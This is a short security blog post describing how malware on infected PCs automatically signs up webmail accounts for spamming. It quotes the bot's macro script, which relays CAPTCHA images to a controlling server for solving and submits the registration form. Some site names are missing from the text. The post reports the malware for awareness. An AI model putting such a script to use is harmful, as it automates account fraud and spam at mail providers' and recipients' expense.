Select Page

Just an observation, nothing earth-shattering: We’re seeing infected systems being signed up automatically to for spamming.

The spammers use infected machines to sign up for webmail accounts at We saw this about a year and a half ago with Yahoo! Mail accounts. A trivial little script runs which signs the user up:

!GOTO 80
!GOTOLINKTEXT 80 /cgi-bin/signup
!SAVEIMG MY_MACRO_WEB_SERV MY_MACRO_WEB_SERV_PORT /wss/wssa2/uppic.php get_image?id= mailru 1
!SLEEP 200
!GETCODE MY_MACRO_WEB_SERV MY_MACRO_WEB_SERV_PORT /wss/wssa2/piccode.php mailru
!POST 80 /cgi-bin/ reg"
Count [_HIDDEN_]
back [_HIDDEN_]
Username [redacted]
Password [redacted]
Password_Verify [redacted]
Password_Question %CD%EE%EC%E5%F0+%EF%E0%F1%EF%EE%F0%F2a
Password_CustomQuestion [NULL]
Password_Answer [redacted]

Email [NULL]
FirstName Maks
LastName M
BirthDay 9
BirthMonth 9
BirthYear 1965
Sex 1
Mrim.Country 123
Mrim.Region 0
mra1 0
security_image_id [_HIDDEN_]
security_image_answer [PICCODE]
B1 +%C7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%F2%FC+%EF%EE%F7%F2%EE%E2%FB%E9+%FF%F9%E8%EA+
!PARSE MY_MACRO_WEB_SERV MY_MACRO_WEB_SERV_PORT /wss/wssa2/check.php msglist?folder 430 5
!GOTO[portions redacted] 80
!GOTO 80

Then, they post the account information back to the controlling server:


Alex Eckelberry
(Thanks Adam Thomas)